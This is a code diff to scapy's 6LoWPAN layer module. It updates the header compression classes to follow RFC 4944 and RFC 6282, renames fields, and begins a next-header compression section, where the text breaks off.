a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -10,9 +10,9 @@ This implementation follows the next documents: -- Transmission of IPv6 Packets over IEEE 802.15.4 Networks +- Transmission of IPv6 Packets over IEEE 802.15.4 Networks: RFC 4944 - Compression Format for IPv6 Datagrams in Low Power and Lossy - networks (6LoWPAN): draft-ietf-6lowpan-hc-15 + networks (6LoWPAN): RFC 6282 - RFC 4291 +----------------------------+-----------------------+ @@ -45,9 +45,7 @@ Known Issues: * Unimplemented context information - * Next header compression techniques - * Unimplemented LoWPANBroadcast - + * Unimplemented IPv6 extensions fields """ import socket @@ -56,16 +54,36 @@ from scapy.compat import chb, orb, raw from scapy.data import ETHER_TYPES -from scapy.packet import Packet, bind_layers -from scapy.fields import BitField, ByteField, BitEnumField, BitFieldLenField, \ - XShortField, FlagsField, ConditionalField, FieldLenField +from scapy.packet import Packet, bind_layers, bind_top_down +from scapy.fields import ( + BitEnumField, + BitField, + BitFixedLenField, + BitScalingField, + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + MultipleTypeField, + PacketField, + PacketListField, + StrFixedLenField, + XBitField, + XLongField, + XShortField, +) from scapy.layers.dot15d4 import Dot15d4Data -from scapy.layers.inet6 import IPv6, IP6Field +from scapy.layers.inet6 import ( + IP6Field, + IPv6, + _IPv6ExtHdr, + ipv6nh, +) from scapy.layers.inet import UDP from scapy.layers.l2 import Ether -from scapy.utils import lhex, mac2str +from scapy.utils import mac2str from scapy.config import conf from scapy.error import warning @@ -78,10 +96,15 @@ LINK_LOCAL_PREFIX = b"\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # noqa: E501 +########## +# Fields # +########## + + class IP6FieldLenField(IP6Field): __slots__ = ["length_of"] - def __init__(self, name, default, size, length_of=None): + def __init__(self, name, default, length_of=None): IP6Field.__init__(self, name, default) self.length_of = length_of @@ -102,96 +125,256 @@ def getfield(self, pkt, s): self.m2i(pkt, b"\x00" * (16 - tmp_len) + s[:tmp_len])) -class BitVarSizeField(BitField): - __slots__ = ["length_f"] +################# +# Basic 6LoWPAN # +################# +# https://tools.ietf.org/html/rfc4944 - def __init__(self, name, default, calculate_length=None): - BitField.__init__(self, name, default, 0) - self.length_f = calculate_length - def addfield(self, pkt, s, val): - self.size = self.length_f(pkt) - return BitField.addfield(self, pkt, s, val) - - def getfield(self, pkt, s): - self.size = self.length_f(pkt) - return BitField.getfield(self, pkt, s) +class LoWPANUncompressedIPv6(Packet): + name = "6LoWPAN Uncompressed IPv6" + fields_desc = [ + BitField("_type", 0x41, 8) + ] + def default_payload_class(self, pay): + return IPv6 -class SixLoWPANAddrField(FieldLenField): - """Special field to store 6LoWPAN addresses +# https://tools.ietf.org/html/rfc4944#section-5.2 - 6LoWPAN Addresses have a variable length depending on other parameters. - This special field allows to save them, and encode/decode no matter which - encoding parameters they have. - """ - def i2repr(self, pkt, x): - return lhex(self.i2h(pkt, x)) +class LoWPANMesh(Packet): + name = "6LoWPAN Mesh Packet" + deprecated_fields = { + "_v": ("v", "2.4.4"), + "_f": ("f", "2.4.4"), + "_sourceAddr": ("src", "2.4.4"), + "_destinyAddr": ("dst", "2.4.4"), + } + fields_desc = [ + BitField("reserved", 0x2, 2), + BitEnumField("v", 0x0, 1, ["EUI-64", "Short"]), + BitEnumField("f", 0x0, 1, ["EUI-64", "Short"]), + BitField("hopsLeft", 0x0, 4), + MultipleTypeField( + [(XShortField("src", 0x0), lambda pkt: pkt.v == 1)], + XLongField("src", 0x0) + ), + MultipleTypeField( + [(XShortField("dst", 0x0), lambda pkt: pkt.v == 1)], + XLongField("dst", 0x0) + ) + ] - def addfield(self, pkt, s, val): - """Add an internal value to a string""" - if self.length_of(pkt) == 8: - return s + struct.pack(self.fmt[0] + "B", val) - if self.length_of(pkt) == 16: - return s + struct.pack(self.fmt[0] + "H", val) - if self.length_of(pkt) == 32: - return s + struct.pack(self.fmt[0] + "2H", val) # TODO: fix! - if self.length_of(pkt) == 48: - return s + struct.pack(self.fmt[0] + "3H", val) # TODO: fix! - elif self.length_of(pkt) == 64: - return s + struct.pack(self.fmt[0] + "Q", val) - elif self.length_of(pkt) == 128: - # TODO: FIX THE PACKING!! - return s + struct.pack(self.fmt[0] + "16s", raw(val)) - else: - return s - def getfield(self, pkt, s): - if self.length_of(pkt) == 8: - return s[1:], self.m2i(pkt, struct.unpack(self.fmt[0] + "B", s[:1])[0]) # noqa: E501 - elif self.length_of(pkt) == 16: - return s[2:], self.m2i(pkt, struct.unpack(self.fmt[0] + "H", s[:2])[0]) # noqa: E501 - elif self.length_of(pkt) == 32: - return s[4:], self.m2i(pkt, struct.unpack(self.fmt[0] + "2H", s[:2], s[2:4])[0]) # noqa: E501 - elif self.length_of(pkt) == 48: - return s[6:], self.m2i(pkt, struct.unpack(self.fmt[0] + "3H", s[:2], s[2:4], s[4:6])[0]) # noqa: E501 - elif self.length_of(pkt) == 64: - return s[8:], self.m2i(pkt, struct.unpack(self.fmt[0] + "Q", s[:8])[0]) # noqa: E501 - elif self.length_of(pkt) == 128: - return s[16:], self.m2i(pkt, struct.unpack(self.fmt[0] + "16s", s[:16])[0]) # noqa: E501 +# https://tools.ietf.org/html/rfc4944#section-10.1 +# This implementation is NOT RECOMMENDED according to RFC 6282 -class LoWPANUncompressedIPv6(Packet): - name = "6LoWPAN Uncompressed IPv6" +class LoWPAN_HC2_UDP(Packet): + name = "6LoWPAN HC1 UDP encoding" fields_desc = [ - BitField("_type", 0x0, 8) + BitEnumField("sc", 0, 1, ["In-line", "Compressed"]), + BitEnumField("dc", 0, 1, ["In-line", "Compressed"]), + BitEnumField("lc", 0, 1, ["In-line", "Compressed"]), + BitField("res", 0, 5), ] - def default_payload_class(self, pay): - return IPv6 + def default_payload_class(self, payload): + return conf.padding_layer -class LoWPANMesh(Packet): - name = "6LoWPAN Mesh Packet" +def _get_hc1_pad(pkt): + """ + Get LoWPAN_HC1 padding + + LoWPAN_HC1 is not recommended for several reasons, one + of them being that padding is a mess (not 8-bit regular) + We therefore add padding bits that are not in the spec to restore + 8-bit parity. Wireshark seems to agree + """ + length = 0 # in bits, of the fields that are not //8 + if not pkt.tc_fl: + length += 20 + if pkt.hc2: + if pkt.nh == 1: + length += pkt.hc2Field.sc * 4 + length += pkt.hc2Field.dc * 4 + return (-length) % 8 + + +class LoWPAN_HC1(Packet): + name = "LoWPAN_HC1 Compressed IPv6" fields_desc = [ - BitField("reserved", 0x2, 2), - BitEnumField("_v", 0x0, 1, [False, True]), - BitEnumField("_f", 0x0, 1, [False, True]), - BitField("_hopsLeft", 0x0, 4), - SixLoWPANAddrField("_sourceAddr", 0x0, length_of=lambda pkt: pkt._v and 2 or 8), # noqa: E501 - SixLoWPANAddrField("_destinyAddr", 0x0, length_of=lambda pkt: pkt._f and 2 or 8), # noqa: E501 + # https://tools.ietf.org/html/rfc4944#section-10.1 + ByteField("reserved", 0x42), + BitEnumField("sp", 0, 1, ["In-line", "Compressed"]), + BitEnumField("si", 0, 1, ["In-line", "Elided"]), + BitEnumField("dp", 0, 1, ["In-line", "Compressed"]), + BitEnumField("di", 0, 1, ["In-line", "Elided"]), + BitEnumField("tc_fl", 0, 1, ["Not compressed", "zero"]), + BitEnumField("nh", 0, 2, {0: "not compressed", + 1: "UDP", + 2: "ICMP", + 3: "TCP"}), + BitEnumField("hc2", 0, 1, ["No more header compression bits", + "HC2 Present"]), + # https://tools.ietf.org/html/rfc4944#section-10.2 + ConditionalField( + MultipleTypeField( + [ + (PacketField("hc2Field", LoWPAN_HC2_UDP(), + LoWPAN_HC2_UDP), + lambda pkt: pkt.nh == 1), + # TODO: ICMP & TCP not implemented yet for HC1 + # (PacketField("hc2Field", LoWPAN_HC2_ICMP(), + # LoWPAN_HC2_ICMP), + # lambda pkt: pkt.nh == 2), + # (PacketField("hc2Field", LoWPAN_HC2_TCP(), + # LoWPAN_HC2_TCP), + # lambda pkt: pkt.nh == 3), + ], + StrFixedLenField("hc2Field", b"", 0), + ), + lambda pkt: pkt.hc2 + ), + # IPv6 header fields + # https://tools.ietf.org/html/rfc4944#section-10.3.1 + ByteField("hopLimit", 0x0), + IP6FieldLenField("src", "::", + lambda pkt: (0 if pkt.sp else 8) + + (0 if pkt.si else 8)), + IP6FieldLenField("dst", "::", + lambda pkt: (0 if pkt.dp else 8) + + (0 if pkt.di else 8)), + ConditionalField( + ByteField("traffic_class", 0), + lambda pkt: not pkt.tc_fl + ), + ConditionalField( + BitField("flow_label", 0, 20), + lambda pkt: not pkt.tc_fl + ), + # Other fields + # https://tools.ietf.org/html/rfc4944#section-10.3.2 + ConditionalField( + MultipleTypeField( + [(BitScalingField("udpSourcePort", 0, 4, offset=0xF0B0), + lambda pkt: getattr(pkt.hc2Field, "sc", 0))], + BitField("udpSourcePort", 0, 16) + ), + lambda pkt: pkt.nh == 1 and pkt.hc2 + ), + ConditionalField( + MultipleTypeField( + [(BitScalingField("udpDestPort", 0, 4, offset=0xF0B0), + lambda pkt: getattr(pkt.hc2Field, "dc", 0))], + BitField("udpDestPort", 0, 16) + ), + lambda pkt: pkt.nh == 1 and pkt.hc2 + ), + ConditionalField( + BitField("udpLength", 0, 16), + lambda pkt: pkt.nh == 1 and pkt.hc2 and not pkt.hc2Field.lc + ), + ConditionalField( + XBitField("udpChecksum", 0, 16), + lambda pkt: pkt.nh == 1 and pkt.hc2 + ), + # Out of spec + BitFixedLenField("pad", 0, _get_hc1_pad) ] - def guess_payload_class(self, payload): - # check first 2 bytes if they are ZERO it's not a 6LoWPAN packet - pass + def post_dissect(self, data): + # uncompress payload + packet = IPv6() + packet.version = IPHC_DEFAULT_VERSION + packet.tc = self.traffic_class + packet.fl = self.flow_label + nh_match = { + 1: socket.IPPROTO_UDP, + 2: socket.IPPROTO_ICMP, + 3: socket.IPPROTO_TCP + } + if self.nh: + packet.nh = nh_match.get(self.nh) + packet.hlim = self.hopLimit + + packet.src = self.decompressSourceAddr() + packet.dst = self.decompressDestAddr() + + if self.hc2 and self.nh == 1: # UDP + udp = UDP() + udp.sport = self.udpSourcePort + udp.dport = self.udpDestPort + udp.len = self.udpLength or None + udp.chksum = self.udpChecksum + udp.add_payload(data) + packet.add_payload(udp) + else: + packet.add_payload(data) + data = raw(packet) + return Packet.post_dissect(self, data) + + def decompressSourceAddr(self): + if not self.sp and not self.si: + # Prefix & Interface + return self.src + elif not self.si: + # Only interface + addr = inet_pton(socket.AF_INET6, self.src)[-8:] + addr = LINK_LOCAL_PREFIX[:8] + addr + else: + # Interface not provided + addr = _extract_upperaddress(self, source=True) + self.src = inet_ntop(socket.AF_INET6, addr) + return self.src + + def decompressDestAddr(self): + if not self.dp and not self.di: + # Prefix & Interface + return self.dst + elif not self.di: + # Only interface + addr = inet_pton(socket.AF_INET6, self.dst)[-8:] + addr = LINK_LOCAL_PREFIX[:8] + addr + else: + # Interface not provided + addr = _extract_upperaddress(self, source=False) + self.dst = inet_ntop(socket.AF_INET6, addr) + return self.dst + + def do_build(self): + if not isinstance(self.payload, IPv6): + return Packet.do_build(self) + # IPv6 + ipv6 = self.payload + self.src = ipv6.src + self.dst = ipv6.dst + self.flow_label = ipv6.fl + self.traffic_class = ipv6.tc + self.hopLimit = ipv6.hlim + if isinstance(ipv6.payload, UDP): + self.nh = 1 + self.hc2 = 1 + udp = ipv6.payload + self.udpSourcePort = udp.sport + self.udpDestPort = udp.dport + if not udp.len or not udp.chksum: + udp = UDP(raw(udp)) + self.udpLength = udp.len + self.udpChecksum = udp.chksum + return Packet.do_build(self) + + def do_build_payload(self): + # Elide the IPv6 and UDP payload + if isinstance(self.payload, IPv6): + if isinstance(self.payload.payload, UDP): + return raw(self.payload.payload.payload) + return raw(self.payload.payload) + return Packet.do_build_payload(self) -############################################################################### -# Fragmentation -# -# Section 5.3 - September 2007 -############################################################################### +# https://tools.ietf.org/html/rfc4944#section-5.3 class LoWPANFragmentationFirst(Packet): @@ -213,13 +396,28 @@ class LoWPANFragmentationSubsequent(Packet): ] +# https://tools.ietf.org/html/rfc4944#section-11.1 + +class LoWPANBroadcast(Packet): + name = "6LoWPAN Broadcast" + fields_desc = [ + ByteField("reserved", 0x50), + ByteField("seq", 0) + ] + + +######################### +# LoWPAN_IPHC (RFC6282) # +######################### + + IPHC_DEFAULT_VERSION = 6 IPHC_DEFAULT_TF = 0 IPHC_DEFAULT_FL = 0 -def source_addr_mode2(pkt): - """source_addr_mode +def source_addr_size(pkt): + """Source address size This function depending on the arguments returns the amount of bits to be used by the source address. @@ -247,11 +445,11 @@ def source_addr_mode2(pkt): return 0 -def destiny_addr_mode(pkt): - """destiny_addr_mode +def dest_addr_size(pkt): + """Destination address size This function depending on the arguments returns the amount of bits to be - used by the destiny address. + used by the destination address. Keyword arguments: pkt -- packet object instance @@ -267,7 +465,8 @@ def destiny_addr_mode(pkt): return 0 elif pkt.m == 0 and pkt.dac == 1: if pkt.dam == 0x0: - raise Exception('reserved') + # reserved + return 0 elif pkt.dam == 0x1: return 8 elif pkt.dam == 0x2: @@ -287,69 +486,14 @@ def destiny_addr_mode(pkt): if pkt.dam == 0x0: return 6 elif pkt.dam == 0x1: - raise Exception('reserved') + # reserved + return 0 elif pkt.dam == 0x2: - raise Exception('reserved') + # reserved + return 0 elif pkt.dam == 0x3: - raise Exception('reserved') - - -def nhc_port(pkt): - if not pkt.nh: - return 0, 0 - if pkt.header_compression & 0x3 == 0x3: - return 4, 4 - elif pkt.header_compression & 0x2 == 0x2: - return 8, 16 - elif pkt.header_compression & 0x1 == 0x1: - return 16, 8 - else: - return 16, 16 - - -def pad_trafficclass(pkt): - """ - This function depending on the arguments returns the amount of bits to be - used by the padding of the traffic class. - - Keyword arguments: - pkt -- packet object instance - """ - if pkt.tf == 0x0: - return 4 - elif pkt.tf == 0x1: - return 2 - elif pkt.tf == 0x2: - return 0 - else: - return 0 - - -def flowlabel_len(pkt): - """ - This function depending on the arguments returns the amount of bits to be - used by the padding of the traffic class. - - Keyword arguments: - pkt -- packet object instance - """ - if pkt.tf == 0x0: - return 20 - elif pkt.tf == 0x1: - return 20 - else: - return 0 - - -def _tf_last_attempt(pkt): - if pkt.tf == 0: - return 2, 6, 4, 20 - elif pkt.tf == 1: - return 2, 0, 2, 20 - elif pkt.tf == 2: - return 2, 6, 0, 0 - else: - return 0, 0, 0, 0 + # reserved + return 0 def _extract_upperaddress(pkt, source=True): @@ -361,7 +505,7 @@ def _extract_upperaddress(pkt, source=True): params: - source: if True, the address is the source one. Otherwise, it is the destination. - returns: the packed & processed address + returns: (upper_address, ipv6_address) """ # https://tools.ietf.org/html/rfc6282#section-3.2.2 SUPPORTED_LAYERS = (Ether, Dot15d4Data) @@ -389,9 +533,10 @@ def _extract_upperaddress(pkt, source=True): else: # Most of the times, it's necessary the IEEE 802.15.4 data to extract # this address, sometimes another layer. - raise Exception( + warning( 'Unimplemented: Unsupported upper layer: %s' % type(underlayer) ) + return b"\x00" * 16 class LoWPAN_IPHC(Packet): @@ -399,65 +544,77 @@ class LoWPAN_IPHC(Packet): It follows the implementation of RFC6282 """ + __slots__ = ["_ipv6"] # the LOWPAN_IPHC encoding utilizes 13 bits, 5 dispatch type name = "LoWPAN IP Header Compression Packet" - _address_modes = ["Unspecified", "1", "16-bits inline", "Compressed"] - _state_mode = ["Stateless", "Stateful"] + _address_modes = ["Unspecified (0)", "1", "16-bits inline (3)", + "Compressed (3)"] + _state_mode = ["Stateless (0)", "Stateful (1)"] + deprecated_fields = { + "_nhField": ("nhField", "2.4.4"), + "_hopLimit": ("hopLimit", "2.4.4"), + "sourceAddr": ("src", "2.4.4"), + "destinyAddr": ("dst", "2.4.4"), + "udpDestinyPort": ("udpDestPort", "2.4.4"), + } fields_desc = [ - # dispatch + # Base Format https://tools.ietf.org/html/rfc6282#section-3.1.2 BitField("_reserved", 0x03, 3), BitField("tf", 0x0, 2), BitEnumField("nh", 0x0, 1, ["Inline", "Compressed"]), - BitField("hlim", 0x0, 2), - BitEnumField("cid", 0x0, 1, [False, True]), + BitEnumField("hlim", 0x0, 2, {0: "Inline", + 1: "Compressed/HL1", + 2: "Compressed/HL64", + 3: "Compressed/HL255"}), + BitEnumField("cid", 0x0, 1, {1: "Present (1)"}), BitEnumField("sac", 0x0, 1, _state_mode), BitEnumField("sam", 0x0, 2, _address_modes), - BitEnumField("m", 0x0, 1, [False, True]), + BitEnumField("m", 0x0, 1, {1: "multicast (1)"}), BitEnumField("dac", 0x0, 1, _state_mode), BitEnumField("dam", 0x0, 2, _address_modes), + # https://tools.ietf.org/html/rfc6282#section-3.1.2 + # Context Identifier Extension ConditionalField( - ByteField("_contextIdentifierExtension", 0x0), + BitField("sci", 0, 4), lambda pkt: pkt.cid == 0x1 ), - # TODO: THIS IS WRONG!!!!! - BitVarSizeField("tc_ecn", 0, calculate_length=lambda pkt: _tf_last_attempt(pkt)[0]), # noqa: E501 - BitVarSizeField("tc_dscp", 0, calculate_length=lambda pkt: _tf_last_attempt(pkt)[1]), # noqa: E501 - BitVarSizeField("_padd", 0, calculate_length=lambda pkt: _tf_last_attempt(pkt)[2]), # noqa: E501 - BitVarSizeField("flowlabel", 0, calculate_length=lambda pkt: _tf_last_attempt(pkt)[3]), # noqa: E501 - - # NH ConditionalField( - ByteField("_nhField", 0x0), - lambda pkt: not pkt.nh + BitField("dci", 0, 4), + lambda pkt: pkt.cid == 0x1 ), - # HLIM: Hop Limit: if it's 0 + # https://tools.ietf.org/html/rfc6282#section-3.2.1 ConditionalField( - ByteField("_hopLimit", 0x0), - lambda pkt: pkt.hlim == 0x0 + BitField("tc_ecn", 0, 2), + lambda pkt: pkt.tf in [0, 1, 2] ), - IP6FieldLenField("sourceAddr", "::", 0, length_of=source_addr_mode2), - IP6FieldLenField("destinyAddr", "::", 0, length_of=destiny_addr_mode), # problem when it's 0 # noqa: E501 - - # LoWPAN_UDP Header Compression ######################################## # noqa: E501 - # TODO: IMPROVE!!!!! ConditionalField( - FlagsField("header_compression", 0, 8, ["A", "B", "C", "D", "E", "C", "PS", "PD"]), # noqa: E501 - lambda pkt: pkt.nh + BitField("tc_dscp", 0, 6), + lambda pkt: pkt.tf in [0, 2], ), ConditionalField( - BitFieldLenField("udpSourcePort", 0x0, 16, length_of=lambda pkt: nhc_port(pkt)[0]), # noqa: E501 - # ShortField("udpSourcePort", 0x0), - lambda pkt: pkt.nh and pkt.header_compression & 0x2 == 0x0 + MultipleTypeField( + [(BitField("rsv", 0, 4), lambda pkt: pkt.tf == 0)], + BitField("rsv", 0, 2), + ), + lambda pkt: pkt.tf in [0, 1] ), ConditionalField( - BitFieldLenField("udpDestinyPort", 0x0, 16, length_of=lambda pkt: nhc_port(pkt)[1]), # noqa: E501 - lambda pkt: pkt.nh and pkt.header_compression & 0x1 == 0x0 + BitField("flowlabel", 0, 20), + lambda pkt: pkt.tf in [0, 1] ), + # Inline fields https://tools.ietf.org/html/rfc6282#section-3.1.1 ConditionalField( - XShortField("udpChecksum", 0x0), - lambda pkt: pkt.nh and pkt.header_compression & 0x4 == 0x0 + ByteEnumField("nhField", 0x0, ipv6nh), + lambda pkt: pkt.nh == 0x0 ), - + ConditionalField( + ByteField("hopLimit", 0x0), + lambda pkt: pkt.hlim == 0x0 + ), + # The src and dst fields are filled up or removed in the + # pre_dissect and post_build, depending on the other options. + IP6FieldLenField("src", "::", length_of=source_addr_size), + IP6FieldLenField("dst", "::", length_of=dest_addr_size), # problem when it's 0 # noqa: E501 ] def post_dissect(self, data): @@ -469,109 +626,89 @@ def post_dissect(self, data): # uncompress payload packet = IPv6() - packet.version = IPHC_DEFAULT_VERSION packet.tc, packet.fl = self._getTrafficClassAndFlowLabel() if not self.nh: - packet.nh = self._nhField + packet.nh = self.nhField # HLIM: Hop Limit if self.hlim == 0: - packet.hlim = self._hopLimit + packet.hlim = self.hopLimit elif self.hlim == 0x1: packet.hlim = 1 elif self.hlim == 0x2: packet.hlim = 64 else: packet.hlim = 255 - # TODO: Payload length can be inferred from lower layers from either the # noqa: E501 - # 6LoWPAN Fragmentation header or the IEEE802.15.4 header packet.src = self.decompressSourceAddr(packet) - packet.dst = self.decompressDestinyAddr(packet) + packet.dst = self.decompressDestAddr(packet) - if self.nh == 1: - # The Next Header field is compressed and the next header is - # encoded using LOWPAN_NHC - - packet.nh = 0x11 # UDP - udp = UDP() - if self.header_compression and \ - self.header_compression & 0x4 == 0x0: - udp.chksum = self.udpChecksum - - s, d = nhc_port(self) - if s == 16: - udp.sport = self.udpSourcePort - elif s == 8: - udp.sport = 0xF000 + s - elif s == 4: - udp.sport = 0xF0B0 + s - if d == 16: - udp.dport = self.udpDestinyPort - elif d == 8: - udp.dport = 0xF000 + d - elif d == 4: - udp.dport = 0xF0B0 + d - - packet.payload = udp / data + pay_cls = self.guess_payload_class(data) + if pay_cls == IPv6: + packet.add_payload(data) data = raw(packet) - # else self.nh == 0 not necessary - elif self._nhField & 0xE0 == 0xE0: # IPv6 Extension Header Decompression # noqa: E501 - warning('Unimplemented: IPv6 Extension Header decompression') # noqa: E501 - packet.payload = conf.raw_layer(data) - data = raw(packet) - else: - packet.payload = conf.raw_layer(data) - data = raw(packet) - + elif pay_cls == LoWPAN_NHC: + self._ipv6 = packet return Packet.post_dissect(self, data) - def decompressDestinyAddr(self, packet): + def decompressDestAddr(self, packet): + # https://tools.ietf.org/html/rfc6282#section-3.1.1 try: - tmp_ip = inet_pton(socket.AF_INET6, self.destinyAddr) + tmp_ip = inet_pton(socket.AF_INET6, self.dst) except socket.error: tmp_ip = b"\x00" * 16 if self.m == 0 and self.dac == 0: if self.dam == 0: + # Address fully carried pass elif self.dam == 1: tmp_ip = LINK_LOCAL_PREFIX[0:8] + tmp_ip[-8:] elif self.dam == 2: tmp_ip = LINK_LOCAL_PREFIX[0:8] + b"\x00\x00\x00\xff\xfe\x00" + tmp_ip[-2:] # noqa: E501 elif self.dam == 3: - # TODO May need some extra changes, we are copying - # (self.m == 0 and self.dac == 1) tmp_ip = _extract_upperaddress(self, source=False) elif self.m == 0 and self.dac == 1: if self.dam == 0: - raise Exception('Reserved') + # reserved + pass elif self.dam == 0x3: + # should use context IID + encapsulating header tmp_ip = _extract_upperaddress(self, source=False) elif self.dam not in [0x1, 0x2]: - warning("Unknown destiny address compression mode !") + # https://tools.ietf.org/html/rfc6282#page-9 + # Should use context information: unimplemented + pass elif self.m == 1 and self.dac == 0: if self.dam == 0: - raise Exception("unimplemented") + # Address fully carried + pass elif self.dam == 1: - tmp = b"\xff" + chb(tmp_ip[16 - destiny_addr_mode(self)]) + tmp = b"\xff" + chb(tmp_ip[16 - dest_addr_size(self)]) tmp_ip = tmp + b"\x00" * 9 + tmp_ip[-5:] elif self.dam == 2: - tmp = b"\xff" + chb(tmp_ip[16 - destiny_addr_mode(self)]) + tmp = b"\xff" + chb(tmp_ip[16 - dest_addr_size(self)]) tmp_ip = tmp + b"\x00" * 11 + tmp_ip[-3:] else: # self.dam == 3: tmp_ip = b"\xff\x02" + b"\x00" * 13 + tmp_ip[-1:] elif self.m == 1 and self.dac == 1: if self.dam == 0x0: - # See https://tools.ietf.org/html/rfc6282#page-9 - raise Exception("Unimplemented: I didn't understand the 6lowpan specification") # noqa: E501 - else: # all the others values - raise Exception("Reserved value by specification.") + # https://tools.ietf.org/html/rfc6282#page-10 + # https://github.com/wireshark/wireshark/blob/f54611d1104d85a425e52c7318c522ed249916b6/epan/dissectors/packet-6lowpan.c#L2149-L2166 + # Format: ffXX:XXLL:PPPP:PPPP:PPPP:PPPP:XXXX:XXXX + # P and L should be retrieved from context + P = b"\x00" * 16 + L = b"\x00" + X = tmp_ip[-6:] + tmp_ip = b"\xff" + X[:2] + L + P[:8] + X[2:6] + else: # all the others values: reserved + pass - self.destinyAddr = inet_ntop(socket.AF_INET6, tmp_ip) - return self.destinyAddr + self.dst = inet_ntop(socket.AF_INET6, tmp_ip) + return self.dst def compressSourceAddr(self, ipv6): + # https://tools.ietf.org/html/rfc6282#section-3.1.1 tmp_ip = inet_pton(socket.AF_INET6, ipv6.src) if self.sac == 0: @@ -591,10 +728,11 @@ def compressSourceAddr(self, ipv6): elif self.sam == 0x2: tmp_ip = tmp_ip[14:16] - self.sourceAddr = inet_ntop(socket.AF_INET6, b"\x00" * (16 - len(tmp_ip)) + tmp_ip) # noqa: E501 - return self.sourceAddr + self.src = inet_ntop(socket.AF_INET6, b"\x00" * (16 - len(tmp_ip)) + tmp_ip) # noqa: E501 + return self.src - def compressDestinyAddr(self, ipv6): + def compressDestAddr(self, ipv6): + # https://tools.ietf.org/html/rfc6282#section-3.1.1 tmp_ip = inet_pton(socket.AF_INET6, ipv6.dst) if self.m == 0 and self.dac == 0: @@ -610,6 +748,8 @@ def compressDestinyAddr(self, ipv6): elif self.dam == 0x2: tmp_ip = b"\x00" * 14 + tmp_ip[14:16] elif self.m == 1 and self.dac == 0: + if self.dam == 0x0: + pass if self.dam == 0x1: tmp_ip = b"\x00" * 10 + tmp_ip[1:2] + tmp_ip[11:16] elif self.dam == 0x2: @@ -617,51 +757,63 @@ def compressDestinyAddr(self, ipv6): elif self.dam == 0x3: tmp_ip = b"\x00" * 15 + tmp_ip[15:16] elif self.m == 1 and self.dac == 1: - raise Exception('Unimplemented') + if self.dam == 0: + tmp_ip = b"\x00" * 10 + tmp_ip[1:3] + tmp_ip[12:16] - self.destinyAddr = inet_ntop(socket.AF_INET6, tmp_ip) + self.dst = inet_ntop(socket.AF_INET6, tmp_ip) def decompressSourceAddr(self, packet): + # https://tools.ietf.org/html/rfc6282#section-3.1.1 try: - tmp_ip = inet_pton(socket.AF_INET6, self.sourceAddr) + tmp_ip = inet_pton(socket.AF_INET6, self.src) except socket.error: tmp_ip = b"\x00" * 16 if self.sac == 0: if self.sam == 0x0: + # Full address is carried in-line pass elif self.sam == 0x1: - tmp_ip = LINK_LOCAL_PREFIX[0:8] + tmp_ip[16 - source_addr_mode2(self):16] # noqa: E501 + tmp_ip = LINK_LOCAL_PREFIX[0:8] + tmp_ip[16 - source_addr_size(self):16] # noqa: E501 elif self.sam == 0x2: tmp = LINK_LOCAL_PREFIX[0:8] + b"\x00\x00\x00\xff\xfe\x00" - tmp_ip = tmp + tmp_ip[16 - source_addr_mode2(self):16] - elif self.sam == 0x3: # EXTRACT ADDRESS FROM Dot15d4 + tmp_ip = tmp + tmp_ip[16 - source_addr_size(self):16] + elif self.sam == 0x3: + # Taken from encapsulating header tmp_ip = _extract_upperaddress(self, source=True) - else: - warning("Unknown source address compression mode !") else: # self.sac == 1: if self.sam == 0x0: + # Unspecified address :: + pass + elif self.sam == 0x1: + # should use context IID pass elif self.sam == 0x2: - # TODO: take context IID + # should use context IID tmp = LINK_LOCAL_PREFIX[0:8] + b"\x00\x00\x00\xff\xfe\x00" - tmp_ip = tmp + tmp_ip[16 - source_addr_mode2(self):16] + tmp_ip = tmp + tmp_ip[16 - source_addr_size(self):16] elif self.sam == 0x3: - tmp_ip = LINK_LOCAL_PREFIX[0:8] + b"\x00" * 8 # TODO: CONTEXT ID # noqa: E501 - else: - raise Exception('Unimplemented') - self.sourceAddr = inet_ntop(socket.AF_INET6, tmp_ip) - return self.sourceAddr + # should use context IID + tmp_ip = LINK_LOCAL_PREFIX[0:8] + b"\x00" * 8 + self.src = inet_ntop(socket.AF_INET6, tmp_ip) + return self.src def guess_payload_class(self, payload): - if self.underlayer and isinstance(self.underlayer, (LoWPANFragmentationFirst, LoWPANFragmentationSubsequent)): # noqa: E501 + if self.nh: + return LoWPAN_NHC + u = self.underlayer + if u and isinstance(u, (LoWPANFragmentationFirst, + LoWPANFragmentationSubsequent)): return Raw return IPv6 def do_build(self): - if not isinstance(self.payload, IPv6): + _cur = self + if isinstance(_cur.payload, LoWPAN_NHC): + _cur = _cur.payload + if not isinstance(_cur.payload, IPv6): return Packet.do_build(self) - ipv6 = self.payload + ipv6 = _cur.payload self._reserved = 0x03 @@ -684,15 +836,14 @@ def do_build(self): # 2. Next Header if self.nh == 0x0: - self.nh = 0 # ipv6.nh - elif self.nh == 0x1: - self.nh = 0 # disable compression - # The Next Header field is compressed and the next header is encoded using LOWPAN_NHC, which is discussed in Section 4.1. # noqa: E501 - warning('Next header compression is not implemented yet ! Will be ignored') # noqa: E501 + self.nhField = ipv6.nh + elif self.nh == 1: + # This will be handled in LoWPAN_NHC + pass # 3. HLim if self.hlim == 0x0: - self._hopLimit = ipv6.hlim + self.hopLimit = ipv6.hlim else: # if hlim is 1, 2 or 3, there are nothing to do! pass @@ -700,21 +851,20 @@ def do_build(self): if self.cid == 0x0: pass else: - # TODO: Context Unimplemented yet in my class - self._contextIdentifierExtension = 0 + # TODO: Context Unimplemented yet + pass # 5. Compress Source Addr self.compressSourceAddr(ipv6) - self.compressDestinyAddr(ipv6) + self.compressDestAddr(ipv6) return Packet.do_build(self) def do_build_payload(self): - if self.header_compression and\ - self.header_compression & 240 == 240: # TODO: UDP header IMPROVE - return raw(self.payload)[40 + 16:] - else: - return raw(self.payload)[40:] + # Elide the IPv6 payload + if isinstance(self.payload, IPv6): + return raw(self.payload.payload) + return Packet.do_build_payload(self) def _getTrafficClassAndFlowLabel(self): """Page 6, draft feb 2011 """ @@ -727,35 +877,250 @@ def _getTrafficClassAndFlowLabel(self): else: return 0, 0 -# Old compression (deprecated) +############## +# LOWPAN_NHC # +############## + +# https://tools.ietf.org/html/rfc6282#section-4 + + +class LoWPAN_NHC_Hdr(Packet): + @classmethod + def get_next_cls(cls, s): + if s and len(s) >= 2: + fb = ord(s[:1]) + if fb >> 3 == 0x1e: + return LoWPAN_NHC_UDP + if fb >> 4 == 0xe: + return LoWPAN_NHC_IPv6Ext + return None + + @classmethod + 